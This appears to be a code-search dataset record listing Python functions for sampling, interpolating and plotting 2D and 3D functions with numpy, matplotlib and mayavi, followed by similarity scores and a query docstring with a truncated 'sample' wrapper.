"def profileXY(xdata, ydata, zdata, nbinsx, nbinsy,\n xrange=None, yrange=None, zrange=None, drop_nan=True):\n xmin, xmax = (np.min(xdata), np.max(xdata)) if xrange is None else xrange\n ymin, ymax = (np.min(ydata), np.max(ydata)) if yrange is None else yrange\n zmin, zmax = (np.min(zdata), np.max(zdata)) if zrange is None else zrange\n\n x_out = np.linspace(xmin, xmax, nbinsx+1)\n y_out = np.linspace(ymin, ymax, nbinsy+1)\n z_out = np.empty((nbinsx, nbinsy))\n z_err = np.empty((nbinsx, nbinsy))\n dx = np.diff(x_out)[0]\n dy = np.diff(y_out)[0]\n\n selection = (in_range(xdata, xmin, xmax) &\n in_range(ydata, ymin, ymax) &\n in_range(zdata, zmin, zmax))\n xdata, ydata, zdata = xdata[selection], ydata[selection], zdata[selection]\n for i in range(nbinsx):\n for j in range(nbinsy):\n selection = (in_range(xdata, x_out[i], x_out[i+1]) &\n in_range(ydata, y_out[j], y_out[j+1]))\n bin_data = np.extract(selection, zdata)\n z_out[i,j] = np.nanmean(bin_data) if bin_data.size else 0.\n z_err[i,j] = np.nanstd(bin_data) / bin_data.size**0.5 if bin_data.size else 0.\n x_out += dx / 2.\n y_out += dy / 2.\n x_out = x_out[:-1]\n y_out = y_out[:-1]\n if drop_nan:\n selection = (np.isnan(z_out) | np.isnan(z_err))\n z_out[selection] = 0\n z_err[selection] = 0\n return x_out, y_out, z_out, z_err",
"def function_to_surface (x, y, func, hist=False):\n dx = x[1] - x[0]\n dy = y[1] - y[0]\n xbins = np.r_[x - dx/2., x[-1] + dx/2.]\n ybins = np.r_[y - dy/2., y[-1] + dy/2.]\n values = np.vectorize (func) (*np.meshgrid (x, y)).T\n if hist:\n return Hist2D (xbins, ybins, values)\n else:\n return Surface2D (xbins, ybins, values)",
"def Generate_Custom(f, n, m):\n return np.fromfunction(np.vectorize(f, otypes=[float]), (n,m))",
"def x_mesh(N,interval):\n (a,b) = interval\n h = (b-a)/N\n xmesh1=[a]\n for i in range(1,N):\n xmesh1.append(a+i*h)\n xmesh1.append(b)\n xmesh2=xmesh1[1:N]\n \n return xmesh1,xmesh2",
"def plot3d(x, y, z, savefig = True):\n\n fig = plt.figure(figsize=(12, 7))\n ax = fig.gca(projection='3d')\n\n # Plot the surface.\n surf = ax.plot_surface(x, y, z, cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\n\n # Customize the z axis.\n ax.zaxis.set_major_locator(LinearLocator(10))\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n\n # Add a color bar which maps values to colors.\n fig.colorbar(surf, shrink=0.5, aspect=5)\n ax.set_xlabel('Arbitary length x', fontsize = 13)\n ax.set_ylabel('Arbitary length y', fontsize = 13)\n ax.set_zlabel('Arbitary height z', fontsize = 13)\n\n try:\n fig.savefig(results_dir + savefig)\n except:\n pass\n plt.show()",
"def plot_three_functions(values, sin_values, cos_values, complex_function_values):\n\n # Cambio la escala del eje x a una trigonometrica\n # En el docstring de la funcion indico de donde copio esta funcion\n # Esta funcion ESTA COPIADA DE INTERNET como especifico en la documentacion\n set_x_axis_scale_to_pi()\n\n # Pongo un titulo al grafico\n plt.title(\"Gráfica de las tres funciones\")\n\n # En verde, con lineas discontinuas\n plt.plot(values, sin_values, \"--g\")\n\n # En negro, con lineas discontinuas\n plt.plot(values, cos_values, \"--k\")\n\n # En rojo, con lineas discontinuas\n plt.plot(values, complex_function_values, \"--r\")\n\n plt.show()\n wait_for_user_input()",
"def plot_surface_3D(self, length = 30, fps = 30, **kwargs):\n fig = utils.get_figure(scale = 3)\n ax = fig.add_subplot(111, projection = '3d')\n\n # surface_x = self.xi_1_mesh\n # surface_y = self.xi_2_mesh\n # surface_x, surface_y, surface_z = self.surface()\n xyz = self.surface()\n\n # surface_x, surface_y = np.meshgrid(surface_x, surface_y)\n\n # print(np.shape(surface_x))\n # print(np.shape(surface_y))\n # print(np.shape(surface_z))\n\n control_points_x = np.array([control_point[0] for control_point in self.control_net.values()])\n control_points_y = np.array([control_point[1] for control_point in self.control_net.values()])\n control_points_z = np.array([control_point[2] for control_point in self.control_net.values()])\n\n # x_min = min(np.min(surface_x), np.min(control_points_x))\n # x_max = max(np.max(surface_x), np.max(control_points_x))\n # x_range = np.abs(x_max - x_min)\n #\n # y_min = min(np.min(surface_y), np.min(control_points_y))\n # y_max = max(np.max(surface_y), np.max(control_points_y))\n # y_range = np.abs(y_max - y_min)\n #\n # z_min = min(np.min(surface_z), np.min(control_points_z))\n # z_max = max(np.max(surface_z), np.max(control_points_z))\n # z_range = np.abs(z_max - z_min)\n #\n # ax.set_xlim(x_min - 0.05 * x_range, x_max + 0.05 * x_range)\n # ax.set_ylim(y_min - 0.05 * y_range, y_max + 0.05 * y_range)\n # ax.set_zlim(z_min - 0.05 * z_range, z_max + 0.05 * z_range)\n\n ax.scatter(control_points_x, control_points_y, control_points_z, depthshade = False, **CONTROL_POLYGON_KWARGS)\n\n # print(np.max(surface_x), np.max(surface_y), np.max(surface_z))\n # print(np.min(surface_x), np.min(surface_y), np.min(surface_z))\n # print(surface_x)\n # print(surface_y)\n # print(surface_z)\n xyz = np.reshape(xyz, (-1, 3))\n print(xyz.shape)\n x, y, z = xyz[:, 0], xyz[:, 1], xyz[:, 2]\n ax.scatter(x, y, z)\n # ax.plot_trisurf(\n # x, y, z,\n # cmap = plt.get_cmap('viridis'),\n # linewidth = 0,\n # antialiased = True,\n # )\n # ax.plot_surface(surface_x, surface_y, surface_z, rstride = 1, cstride = 1)\n # ax.plot_trisurf(surface_x, surface_y, surface_z)\n # ax.plot_trisurf(surface_x, surface_y, surface_z, **CURVE_KWARGS)\n\n ax.axis('off')\n\n ax.view_init(elev = 45, azim = 0) # note that this resets ax.dist to 10, so we can't use it below\n ax.dist = 7.5 # default is 10, so zoom in a little because there's no axis to take up the rest of the space\n\n plt.show()\n utils.save_current_figure(**kwargs)\n\n ### ANIMATION ###\n\n frames = length * fps\n\n writer = anim.writers['ffmpeg'](fps = fps, bitrate = 2000) # don't need a very high bitrate\n\n def animate(frame):\n print(frame, frames, frame / frames)\n ax.azim = 360 * frame / frames # one full rotation\n return [] # must return the list of artists we modified (i.e., nothing, since all we did is rotate the view)\n\n ani = anim.FuncAnimation(fig, animate, frames = frames, blit = True)\n ani.save(f\"{os.path.join(kwargs['target_dir'], kwargs['name'])}.mp4\", writer = writer)\n\n plt.close()",
"def prob3(N):\n x, y, n = sy.symbols('x, y, n')\n expr = sy.summation(x**n/sy.factorial(n), (n, 0, N))\n f = sy.lambdify(y, expr.subs(x, -y**2), \"numpy\")\n domain = np.linspace(-2, 2, 100)\n plt.ion()\n plt.plot(domain, np.exp(-1*domain**2), label=\"original function\")\n plt.plot(domain, f(domain), label=\"Maclaurin series\")\n plt.legend()\n plt.show()",
"def interpolate(x_list, y_list, z_list):\n x1 = x_list[-2]\n x2 = x_list[-1]\n y1 = y_list[-2]\n y2 = y_list[-1]\n z1 = z_list[-2]\n z2 = z_list[-1]\n r = -y1/y2\n x_land = (x1+r*x2)/(r+1)\n z_land = (z1+r*z2)/(r+1)\n x_list[-1] = x_land\n y_list[-1] = 0.0\n z_list[-1] = z_land",
"def test_data():\n x = np.array([8, 67, 79, 10, 52, 53, 98, 34, 15, 58], dtype=float)\n y = np.array([24, 87, 48, 94, 98, 66, 14, 24, 60, 16], dtype=float)\n z = np.array([0.064, 4.489, 6.241, 0.1, 2.704, 2.809, 9.604, 1.156,\n 0.225, 3.364], dtype=float)\n\n return x, y, z",
"def plot_3x3_hists(self, skip_obs=None, n_bins=40):\n\n return self.plot_nxn_hists(n=3, skip_obs=skip_obs, n_bins=n_bins)",
"def get3d(infile, histname, subdir='',verbose=False): \n\n ## 2d Histogram\n Hist = getter(infile,histname,subdir,verbose)\n\n nbinsX, nbinsY, nbinsZ = Hist.GetNbinsX(), Hist.GetNbinsY(), Hist.GetNbinsZ()\n Arr = np.zeros((nbinsZ,nbinsY,nbinsX))\n dArr = np.zeros((nbinsZ,nbinsY,nbinsX))\n axesX = np.zeros(nbinsX)\n axesY = np.zeros(nbinsY)\n axesZ = np.zeros(nbinsZ)\n edgesX = np.zeros(nbinsX+1)\n edgesY = np.zeros(nbinsY+1)\n edgesZ = np.zeros(nbinsZ+1)\n for j in xrange(0,nbinsX):\n axesX[j] = Hist.GetXaxis().GetBinCenter(j+1)\n edgesX[j] = Hist.GetXaxis().GetBinLowEdge(j+1)\n edgesX[nbinsX] = Hist.GetXaxis().GetBinLowEdge(nbinsX+1)\n\n for j in xrange(0,nbinsY):\n axesY[j] = Hist.GetYaxis().GetBinCenter(j+1)\n edgesY[j] = Hist.GetYaxis().GetBinLowEdge(j+1)\n edgesY[nbinsY] = Hist.GetYaxis().GetBinLowEdge(nbinsY+1)\n\n for j in xrange(0,nbinsZ):\n axesZ[j] = Hist.GetZaxis().GetBinCenter(j+1)\n edgesZ[j] = Hist.GetZaxis().GetBinLowEdge(j+1)\n edgesZ[nbinsZ] = Hist.GetZaxis().GetBinLowEdge(nbinsZ+1)\n\n axes = [axesX, axesY, axesZ]\n edges = [edgesX, edgesY, edgesZ]\n \n for j in xrange(0,nbinsX):\n for k in xrange(0,nbinsY):\n for l in xrange(0,nbinsZ):\n Arr[l,k,j] = Hist.GetBinContent(j+1,k+1,l+1)\n dArr[l,k,j] = Hist.GetBinError(j+1,k+1,l+1)\n \n return axes, edges, Arr, dArr",
"def testing_fixed_point_newton_interp(fixed_point_functions, n, m=400):\n\n # Function to convert to root finding problem given g(x). 'g(x*) = x*' -> 'f(x*) = 0'\n Ffun = lambda Gfun: lambda x: Gfun(x) -x\n\n import matplotlib.pylab as plt\n\n # setting up figure\n num_plots = len(fixed_point_functions)\n\n fig, axs = plt.subplots(1, num_plots, figsize=(15, 6), facecolor='w', edgecolor='k')\n fig.subplots_adjust(hspace = .5, wspace=.001)\n axs = axs.ravel()\n\n i = 0 # 'graph number'\n for Gfun_name, Gfun in fixed_point_functions.items():\n\n # <computation block>\n\n # convert to root finding problem\n f = Ffun(Gfun)\n\n # compute x and y data points\n x = np.linspace(-1,1,n)\n y = f(x)\n\n # compute coefficients of interpolating polynomial\n c = coeffients(x,y)\n\n # evaluate actual function points for graph\n ax = np.linspace(-1,1,m)\n ay = f(ax)\n\n # calculate y values using the interpolating polynomials coefficients\n y_hats = []\n for xi in ax:\n y_hati = np.polyval(c, xi)\n y_hats.append(y_hati)\n\n # <\\computation block>\n\n # create plot for this function\n axs[i].plot( ax, ay, 'k' ) # function in black\n axs[i].plot( ax, y_hats, 'r' ) # interpolating polynomial in red\n axs[i].set_title(Gfun_name)\n\n # increment graph number\n i += 1\n\n plt.show()",
"def get_data_args(data_func, nfuncs):\n if data_func.__name__ == 'gg_1d':\n # first arg is sorted\n if nfuncs == 1:\n data_args = [{'a': 0.75, 'mu': 0.4, 'sigma': 0.3, 'beta': 2.0}]\n elif nfuncs == 2:\n data_args = [{'a': 0.2, 'mu': 0.4, 'sigma': 0.6, 'beta': 5.0},\n {'a': 0.55, 'mu': 0.4, 'sigma': 0.2, 'beta': 4.0}]\n elif nfuncs == 3:\n data_args = [{'a': 0.2, 'mu': 0.4, 'sigma': 0.6, 'beta': 5.0},\n {'a': 0.35, 'mu': 0.6, 'sigma': 0.07, 'beta': 2.0},\n {'a': 0.55, 'mu': 0.32, 'sigma': 0.14, 'beta': 6.0}]\n elif nfuncs == 4:\n data_args = [{'a': 0.2, 'mu': 0.3, 'sigma': 0.5, 'beta': 5.0},\n {'a': 0.4, 'mu': 0.65, 'sigma': 0.07, 'beta': 2.0},\n {'a': 0.6, 'mu': 0.25, 'sigma': 0.1, 'beta': 6.0},\n {'a': 0.9, 'mu': 0.95, 'sigma': 0.1, 'beta': 6.0}]\n elif data_func.__name__ == 'ta_1d':\n # first arg is sorted\n if nfuncs == 1:\n data_args = [{'a': 0.8, 'w_0': 0.0, 'w_1': 1.5}]\n elif nfuncs == 2:\n data_args = [{'a': 0.7, 'w_0': -1, 'w_1': 3},\n {'a': 0.9, 'w_0': 2, 'w_1': -3}]\n elif nfuncs == 3:\n data_args = [\n {'a': 0.6, 'w_0': -7, 'w_1': 8},\n {'a': 1, 'w_0': -1, 'w_1': 3},\n {'a': 1.4, 'w_0': 2, 'w_1': -3}]\n elif data_func.__name__ == 'gg_2d':\n # the order is (with first arg sorted):\n # [a_1, mu1_1, mu2_1, s1_1, s2_1, b1_1, b2_1, rot angle]\n if nfuncs == 1:\n data_args = [\n {'a': 0.8, 'mu1': 0.6, 'mu2': 0.6, 'sigma1': 0.1,\n 'sigma2': 0.2, 'beta1': 2, 'beta2': 2, 'omega': 0.1 * np.pi}]\n elif nfuncs == 2:\n data_args = [\n {'a': 0.5, 'mu1': 0.5, 'mu2': 0.4, 'sigma1': 0.4,\n 'sigma2': 0.2, 'beta1': 2, 'beta2': 2, 'omega': 0},\n {'a': 0.8, 'mu1': 0.5, 'mu2': 0.6, 'sigma1': 0.1,\n 'sigma2': 0.1, 'beta1': 2, 'beta2': 2, 'omega': 0}]\n elif nfuncs == 3:\n data_args = [\n {'a': 0.5, 'mu1': 0.3, 'mu2': 0.7, 'sigma1': 0.2,\n 'sigma2': 0.2, 'beta1': 2, 'beta2': 2, 'omega': 0},\n {'a': 0.7, 'mu1': 0.7, 'mu2': 0.6, 'sigma1': 0.15,\n 'sigma2': 0.15, 'beta1': 2, 'beta2': 2, 'omega': 0},\n {'a': 0.9, 'mu1': 0.4, 'mu2': 0.3, 'sigma1': 0.1,\n 'sigma2': 0.1, 'beta1': 2, 'beta2': 2, 'omega': 0}]\n try:\n data_args_list = []\n for name in bf.get_bf_param_names(data_func):\n data_args_list += [d[name] for d in data_args]\n return data_args_list\n except NameError:\n raise AssertionError('no data args found! func={} nfuncs={}'.format(\n data_func.__name__, nfuncs))",
"def plotSlider3D(x, y, z, value, levels=25, title=\"Title\", xlab=\"x-axis\", ylab=\"y-axis\"):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n fig.subplots_adjust(left=0.25, bottom=0.25)\n\n C = ax.contourf(x, y, value[:,:,0], levels, cmap=plt.cm.inferno)\n ax.title(title)\n ax.xlabel(xlab)\n ax.ylabel(ylab)\n\n z_slider_ax = fig.add_axes([0.25, 0.1, 0.65, 0.03], axisbg=axis_color)\n z_slider = Slider(z_slider_ax, 'z-axis', 0, 30.0, valinit=freq_0)\n def sliders_on_changed(val):\n ax.contourf(x, y, value[:,:,val],levels)\n fig.canvas.draw_idle()\n z_slider.on_changed(sliders_on_changed)",
"def test_surf():\n def f(x, y):\n sin, cos = numpy.sin, numpy.cos\n return sin(x + y) + sin(2 * x - y) + cos(3 * x + 4 * y)\n\n x, y = numpy.mgrid[-7.:7.05:0.1, -5.:5.05:0.05]\n s = surf(x, y, f)\n mlab.show()\n #cs = contour_surf(x, y, f, contour_z=0)\n return",
"def immoment3D(X, Y, Z, p, q, r):\n assert len(X) == len(Y)\n assert len(Y) == len(Z)\n return (X ** p * Y ** q * Z ** r).sum()",
"def plot_3d(self, ax_3d: Axes3D, n_angles: int = 30, **kwargs) -> None:\n X, Y, Z = self.to_mesh(n_angles)\n\n ax_3d.plot_surface(X, Y, Z, **kwargs)",
"def vector_3d_magnitude(x, y, z):\n return math.sqrt((x * x) + (y * y) + (z * z))",
"def monte_carlo_sample(f, bounds, n_samples):\r\n samples = []\r\n pmax = f(bounds[0])\r\n tries_per_run = int(n_samples*1/pmax)\r\n while len(samples) < n_samples:\r\n x = np.random.rand(tries_per_run)*(bounds[1]-bounds[0])+bounds[0]\r\n y = np.random.rand(tries_per_run)*pmax\r\n good = x[y <= f(x)]\r\n samples = samples + [i for i in x[y <= f(x)]]\r\n return np.array(np.array(samples))[:n_samples]",
"def ijarr2xyz(ijarr2xy_func: Callable, xy2z_func: Callable, i: float, j: float) -> Tuple[float, float, float]:\n\n x, y = ijarr2xy_func(i, j)\n z = xy2z_func(x, y)\n return x, y, z",
"def contour3d(gto, ix=0, m=0, n=100, lower=[-2, -2, -2], upper=[2, 2, 2], contours=5):\n X, Y, Z = np.mgrid[-3:3:150j, -3:3:150j, -3:3:150j] # <- TODO\n f = gto.compute(X, Y, Z, i=ix, m=m)\n logging.debug(f\"Contour min: {np.min(f)}, max: {np.max(f)}\")\n mlab.contour3d(X, Y, Z, f, contours=contours, colormap='cool', transparent=True)",
"def InterpolateFunctions(self, , p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=...):\n ...",
"def generate_data(values, function=non_linear_fn, length=25, range_=[-1, 1]):\n\n # build x vector\n x = np.linspace(range_[0], range_[1], length)\n\n data = np.zeros((values.shape[0], length))\n\n for i in range(values.shape[0]):\n data[i, :] = function(x, values[i, 0], values[i, 1], values[i, 2])\n\n return data",
"def function2D(self, t):\n if t.ndim == 1:\n nX = int(self.getAttributeValue('nX'))\n nY = int(self.getAttributeValue('nY'))\n pos = t.reshape(nX, nY, 2)\n elif t.ndim == 3:\n pos = t\n X = pos[...,0]\n Y = pos[...,1]\n A = self.getParamValue(0)\n muX = self.getParamValue(1)\n muY = self.getParamValue(2)\n sigX = self.getParamValue(3)\n sigY = self.getParamValue(4)\n sigP = self.getParamValue(5)\n bg = self.getParamValue(6)\n\n sigXY = sigX*sigY*sigP\n Z = A*bivariate_normal(X,Y, sigmax=sigX, sigmay=sigY,\n mux=muX,muy=muY,sigmaxy=sigXY)\n Z += bg\n return Z",
"def zzX_abs(f):\n if poly_univariate_p(f):\n return zzx_abs(f)\n else:\n return [ zzX_abs(coeff) for coeff in f ]",
"def Compute3d(self, *args):\n return _BRepAlgo.BRepAlgo_NormalProjection_Compute3d(self, *args)",
"def eval_func_on_grid(f, re, im, N):\n l = re[1] - re[0]\n h = im[1] - im[0]\n resL = N*l #horizontal resolution\n resH = N*h #vertical resolution\n x = np.linspace(re[0], re[1],resL)\n y = np.linspace(im[0], im[1], resH)\n x, y = np.meshgrid(x,y)\n z = x + 1j*y\n w = f(z)\n return w",
"def display3(*args):\n #-------------------- unpack\n twiss_fun = args[0]\n cos_like = args[1]\n sin_like = args[2]\n lat_plot = args[3]\n ape_plot = args[4]\n #-------------------- sigma functions\n # zero = [0. for i in range(sigma_fun.nbpoints)] # zero line\n z = [twiss_fun(i,'s') for i in range(twiss_fun.nbpoints)] # Abszisse\n sgx = [twiss_fun(i,'sigx')*1.e3 for i in range(twiss_fun.nbpoints)] # envelope (sigma-x)\n sgy = [twiss_fun(i,'sigy')*1.e3 for i in range(twiss_fun.nbpoints)] # envelope (sigma-y)\n #-------------------- trajectories\n z1= [cos_like(i,'s') for i in range(cos_like.nbpoints)]\n cx= [cos_like(i,'cx')*1.e3 for i in range(cos_like.nbpoints)]\n # cxp= [cos_like(i,'cxp')*1.e3 for i in range(cos_like.nbpoints)]\n cy= [cos_like(i,'cy')*1.e3 for i in range(cos_like.nbpoints)]\n # cyp= [cos_like(i,'cyp')*1.e3 for i in range(cos_like.nbpoints)]\n cz= [cos_like(i,'cz') for i in range(cos_like.nbpoints)]\n cdp= [cos_like(i,'cdp') for i in range(cos_like.nbpoints)]\n\n z2= [sin_like(i,'s') for i in range(sin_like.nbpoints)]\n sx= [sin_like(i,'sx')*1.e3 for i in range(sin_like.nbpoints)]\n # sxp= [sin_like(i,'sxp')*1.e3 for i in range(sin_like.nbpoints)]\n sy= [sin_like(i,'sy')*1.e3 for i in range(sin_like.nbpoints)]\n # syp= [sin_like(i,'syp')*1.e3 for i in range(sin_like.nbpoints)]\n sz= [sin_like(i,'sz') for i in range(sin_like.nbpoints)]\n sdp= [sin_like(i,'sdp') for i in range(sin_like.nbpoints)]\n #-------------------- lattice viseo\n vzero = [0. for i in range(lat_plot.nbpoints)] # zero line\n vis_abszisse = [lat_plot(i,'s') for i in range(lat_plot.nbpoints)]\n vis_ordinate = [lat_plot(i,'viseo') for i in range(lat_plot.nbpoints)]\n ape_abszisse = [ape_plot(i,'s') for i in range(ape_plot.nbpoints)]\n ape_ordinate = [ape_plot(i,'aperture')*1.e3 for i in range(ape_plot.nbpoints)]\n #-------------------- figure frame\n width=14; height=7.6\n # fighdr = 'lattice version = {}, input file = {}'.format(PARAMS['lattice_version'],PARAMS['input_file'])\n fig = plt.figure(num=1,figsize=(width,height),facecolor='#eaecef',tight_layout=False)\n\n #-------------------- transverse X tracks\n splot311=plt.subplot(311)\n # splot311=plt.subplot(10,1,(1,3))\n splot311.set_title('transverse x')\n # mapping box\n splot311.text(0.01, 1.1,UTIL.FLAGS.get('mapping'),transform=splot311.transAxes,fontsize=8,bbox=dict(boxstyle='round',facecolor='wheat',alpha=0.5),verticalalignment='top')\n if UTIL.FLAGS['envelope']:\n plt.plot(z,sgx ,label=r'$\\sigma$ [mm]',color='green')\n plt.plot(z1,cx, label=\"C [mm]\",color='blue',linestyle='-')\n # plt.plot(z1,cxp,label=\"C' [mr]\",color='blue',linestyle=':')\n plt.plot(z2,sx, label=\"S [mm]\",color='red' ,linestyle='-')\n # plt.plot(z2,sxp,label=\"S' [mr]\",color='red' ,linestyle=':')\n vscale=splot311.axis()[3]*0.25\n viseoz = [x*vscale for x in vis_ordinate]\n plt.plot(vis_abszisse,viseoz,label='',color='black')\n plt.plot(vis_abszisse,vzero,color='green',linestyle='--')\n # apertures\n if UTIL.FLAGS['useaper']:\n plt.plot(ape_abszisse,ape_ordinate,linestyle='-.')\n N = UTIL.PARAMS['nbsigma']\n sgx = [i*N for i in sgx]\n #label = F'{N:1}$\\sigma$ [mm]'\n label = '{:1}$\\sigma$ [mm]'.format(N)\n plt.plot(z,sgx ,label=label,color='green',linestyle=':')\n # zero line\n splot311.plot(vis_abszisse,vzero,color='green',linestyle='--')\n plt.legend(loc='lower right',fontsize='x-small')\n\n #-------------------- transverse Y tracks\n splot312=plt.subplot(312)\n # splot312=plt.subplot(10,1,(4,6))\n splot312.set_title('transverse y')\n if UTIL.FLAGS['envelope']:\n 
plt.plot(z,sgy ,label=r'$\\sigma$ [mm]',color='green')\n plt.plot(z1,cy, label=\"C [mm]\",color='blue',linestyle='-')\n # plt.plot(z1,cyp,label=\"C' [mr]\",color='blue',linestyle=':')\n plt.plot(z2,sy, label=\"S [mm]\",color='red' ,linestyle='-')\n vscale=splot312.axis()[3]*0.25\n viseoz = [x*vscale for x in vis_ordinate]\n plt.plot(vis_abszisse,viseoz,label='',color='black')\n plt.plot(vis_abszisse,vzero,color='green',linestyle='--')\n # apertures\n if UTIL.FLAGS['useaper']:\n plt.plot(ape_abszisse,ape_ordinate,linestyle='-.')\n N = UTIL.PARAMS['nbsigma']\n sgy = [i*N for i in sgy]\n plt.plot(z,sgy ,label=label,color='green',linestyle=':')\n # zero line\n splot312.plot(vis_abszisse,vzero,color='green',linestyle='--')\n plt.legend(loc='lower right',fontsize='x-small')\n\n #-------------------- longitudinal tracks z, dP/P\n # ax_l = left abszisse\n ax_l=plt.subplot(313)\n # ax_l=plt.subplot(10,1,(7,9))\n ax_l.set_title('longitudinal')\n ax_l.set_ylabel(r\"z [mm]\")\n ax_l.tick_params(axis='y', colors='green')\n ax_l.yaxis.label.set_color('green')\n ax_l.plot(z1,cz,label='C',color='green')\n ax_l.plot(z2,sz,label='S',color='green',linestyle=':')\n plt.legend(loc='lower left',fontsize='x-small')\n # ax_r = right abszisse\n ax_r = ax_l.twinx()\n ax_r.set_ylabel(r'$\\Delta$p/p [%]')\n ax_r.tick_params(axis='y', colors='red')\n ax_r.yaxis.label.set_color('red')\n ax_r.plot(z1,cdp,label='C',color='red')\n ax_r.plot(z2,sdp,label='S',color='red',linestyle=':')\n ax_r.plot(vis_abszisse,vzero,color='red', linestyle='--')\n plt.legend(loc='lower right',fontsize='x-small')\n # lattice elements\n vscale=ax_l.axis()[3]*0.25\n viseoz = [x*vscale for x in vis_ordinate]\n ax_l.plot(vis_abszisse,viseoz,label='',color='black')\n ax_l.plot(vis_abszisse,vzero,color='green',linestyle='--')",
"def test_interpolating_y_3d(name, ipset_y_3d):\n if name in (\"lagrange\",):\n pytest.skip(f\"Method {name} does not support 3-dimensional data\")\n\n y_new = interpolation.interpolate(*ipset_y_3d, kind=name, **IPARGS.get(name, {}))\n assert y_new.ndim == 3",
"def list_plot3d(v, interpolation_type='default', texture=\"automatic\", point_list=None, **kwds):\n import numpy\n if texture == \"automatic\":\n texture = \"lightblue\"\n if is_Matrix(v):\n if interpolation_type == 'default' or interpolation_type == 'linear' and 'num_points' not in kwds:\n return list_plot3d_matrix(v, texture=texture, **kwds)\n else:\n l = []\n for i in range(v.nrows()):\n for j in range(v.ncols()):\n l.append((i, j, v[i, j]))\n return list_plot3d_tuples(l, interpolation_type, texture, **kwds)\n\n if isinstance(v, numpy.ndarray):\n return list_plot3d(matrix(v), interpolation_type, texture, **kwds)\n\n if isinstance(v, list):\n if len(v) == 0:\n # return empty 3d graphic\n from .base import Graphics3d\n return Graphics3d()\n elif len(v) == 1:\n # return a point\n from .shapes2 import point3d\n return point3d(v[0], **kwds)\n elif len(v) == 2:\n # return a line\n from .shapes2 import line3d\n return line3d(v, **kwds)\n elif isinstance(v[0], tuple) or point_list == True and len(v[0]) == 3:\n return list_plot3d_tuples(v, interpolation_type, texture=texture, **kwds)\n else:\n return list_plot3d_array_of_arrays(v, interpolation_type, texture, **kwds)\n raise TypeError(\"v must be a matrix or list\")",
"def Values(self, *args):\n return _Adaptor3d.Adaptor3d_InterFunc_Values(self, *args)",
"def interp_nd(z, x, fx, dfx=None, y=None, fpy=None, dfpy=None, \\\n compute_dfz=False, order_set=None):\n # verifying and handling arguments\n d, n = z.shape[1], x.shape[0]\n assert x.shape == (n,d) and fx.shape == (n,)\n if dfx is None:\n dfx = zeros(fx.shape)\n else:\n assert dfx.shape == (n,)\n if y is None:\n assert fpy is None and dfpy is None\n m = 0; y = zeros([0,d]); fpy = zeros([0,d]); dfpy = zeros([0,d])\n else:\n m = y.shape[0]\n assert fpy is not None and fpy.shape == (m,d)\n if dfpy is None:\n dfpy = zeros(fpy.shape)\n else:\n assert dfpy.shape == (m,d)\n # determine expansion order set, its boundary set and zeta\n if order_set is None:\n k = 0; order_set = []\n while len(order_set) < min(n + m*d, 100):\n k += 1\n order_set = max_order_set(d, k)\n else:\n assert len(order_set) > 1 and order_set[0] == (0,)*d\n boundary_set, boundary_zeta = boundary_set_and_zeta(order_set)\n # calculate beta and gamma\n t0 = time.time()\n beta = calc_beta(fx, dfx)\n gamma = calc_gamma_nd(x, fx, dfx, y, fpy, dfpy, \\\n order_set, boundary_set, boundary_zeta)\n print 'time: ', time.time() - t0\n # interpolation for each z[i]\n t0 = time.time()\n fz, dz = [], []\n for zi in z:\n a, b, er2 = interp_nd_coef(zi, x, dfx, y, dfpy, beta, gamma, \\\n order_set, boundary_set, boundary_zeta)\n fz.append(dot(a, fx) + (b*fpy).sum())\n dz.append(sqrt(er2))\n print 'time: ', time.time() - t0\n if compute_dfz:\n return numpy.array(fz), numpy.array(dz)\n else:\n return numpy.array(fz)"
] | [
"0.6324257",
"0.61952674",
"0.60081536",
"0.6003968",
"0.59578633",
"0.5772959",
"0.5612362",
"0.55938494",
"0.5529308",
"0.552768",
"0.5526545",
"0.55223507",
"0.55000556",
"0.5411602",
"0.54069936",
"0.53909606",
"0.5389578",
"0.53585124",
"0.5356868",
"0.53406954",
"0.53343284",
"0.53251106",
"0.5310632",
"0.5283576",
"0.52764714",
"0.52738726",
"0.5269587",
"0.5254057",
"0.525168",
"0.52485824",
"0.5239377",
"0.52253264",
"0.52041084",
"0.5196755",
"0.5195193",
"0.51626784",
"0.51538",
"0.514509",
"0.5142268",
"0.5139996",
"0.5139516",
"0.51353294",
"0.5126034",
"0.512129",
"0.5117012",
"0.51162624",
"0.5116102",
"0.5104233",
"0.50901836",
"0.5088489",
"0.50852156",
"0.50682527",
"0.5065151",
"0.50559133",
"0.50543976",
"0.50379807",
"0.50342256",
"0.5017699",
"0.5017126",
"0.5004723",
"0.50032216",
"0.49910033",
"0.49889168",
"0.49842384",
"0.4978023",
"0.49570096",
"0.49515083",
"0.49445394",
"0.49439746",
"0.49378085",
"0.49366647",
"0.49263766",
"0.49180084",
"0.4914137",
"0.4913917",
"0.49065524",
"0.49058414",
"0.48925197",
"0.48917925",
"0.4889043",
"0.48879376",
"0.48832774",
"0.48820192",
"0.48661828",
"0.48649803",
"0.4861394",
"0.48567602",
"0.4856155",
"0.48517266",
"0.4842139",
"0.4839789",
"0.48341003",
"0.48338127",
"0.4832594",
"0.48291874",
"0.48270172",
"0.48153317",
"0.47979856",
"0.47934785",
"0.47866303"
] | 0.8300914 | 0 |
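The next row's document defines sample(f, *var_args), a wrapper that dispatches to sample2d when one (var, min, max, n) interval tuple is supplied and to sample3d when two are supplied. A minimal usage sketch, assuming sample and the sympy-based sample2d/sample3d helpers it wraps (both appear among that row's negatives further down) are in scope together with matplotlib:

import matplotlib.pyplot as plt
from sympy.abc import x, y

# One interval tuple: sample2d is used and returns 1D X and Y arrays
X, Y = sample(x**2, (x, -2, 2, 40))
plt.plot(X, Y)

# Two interval tuples: sample3d returns meshgrid X, Y and sampled Z values
X, Y, Z = sample(x**2 + y**2, (x, -2, 2, 40), (y, -2, 2, 40))
plt.contourf(X, Y, Z)
plt.show()

Points where f cannot be evaluated numerically are filled with None (sample2d) or 0 (sample3d), so the returned arrays remain plottable.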
Samples a 2d or 3d function over specified intervals and returns a dataset suitable for plotting with matlab (matplotlib) syntax. Wrapper for sample2d and sample3d. f is a function of one or two variables, such as x**2. var_args are intervals for each variable given in the form (var, min, max, n). | def sample(f, *var_args):
if len(var_args) == 1:
return sample2d(f, var_args[0])
elif len(var_args) == 2:
return sample3d(f, var_args[0], var_args[1])
else:
